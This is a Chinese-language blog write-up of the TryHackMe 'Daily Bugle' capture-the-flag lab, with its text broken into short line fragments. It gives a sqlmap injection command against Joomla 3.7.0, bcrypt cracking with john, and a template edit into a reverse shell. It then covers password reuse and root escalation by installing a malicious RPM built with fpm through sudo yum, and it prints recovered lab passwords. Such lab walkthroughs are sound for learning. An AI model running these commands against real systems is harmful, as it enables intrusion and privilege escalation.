扫描打点
看到有个
mysql
后面可能会用到,并且看到80
端口的服务是joomla
robots.txt
里面找到各个网站,就懒得扫了(逃(当然也可以从
nmap
扫描结果中看出来百度一下
joomla
,发现有个工具joomscan
来判断版本joomscan -u 10.10.186.85
看到是
3.7.0
,去exploitdb
搜一搜恰好有poc
让直接拿
sqlmap
硬打就行:sqlmap -u "http://10.10.186.85/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
update:
sqlmap
好慢啊,去找了个专门的poc
来打拿到了用户名
jonah
和加密后的密码:$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
幽默
hash_identifier
没识别只能去这里对着特征找了
以
$2
为开头,搜索到了这个用
john
爆一下:john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt --format=bcrypt
得到密码是
spiderman123
想到刚刚得到的管理员后台,直接登录
joomla
后台getshell
一开始想用
Install
那里传马,但没传上去搜了一下找到
CVE-2021-23132
去
media
中的option
界面,把Path to file Path
改成./
来进行目录遍历到
/administrator/components/com_users
下删除config.xml
并重新上传,内容参考上面的网址等下这里一直上传不上去,但是通读一下
poc
,这一步是为了得到SuperUser
权限的用户,但我们已经是了,就跳到下一步去
templates
那里,修改beez3/error.php
然后访问
templates/beez3/error.php
就能有代码执行既然这样了直接把
error.php
改成反弹shell
即可连接Linux
提权进去之后用户为
apache
,连访问正常用户目录都不行虽然我没有思路,但传个
msf
马先啊嗯看题解,去
/var/www/html
下找到configuration.php
然后要考虑密码复用的问题,即用
nv5uz9r3ZEDzVjNu
试图登录root
或者刚刚的jjameson
这次
sudo -l
终于出东西了:继续去
https://gtfobins.github.io/
找大概是要把提权脚本用
fpm
打成RPM
包,传上去用有权限的yum
运行打包:
fpm -n x -s dir -t rpm -a all --before-install sudo.sh .
运行:
sudo yum localinstall -y x-1.0-1.noarch.rpm
然后
sudo /bin/bash
,提权成功
THM打靶日寄7-DailyBugle
- 本文链接: http://noone40404.github.io/2024/09/14/THM打靶日寄7:DailyBugle/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!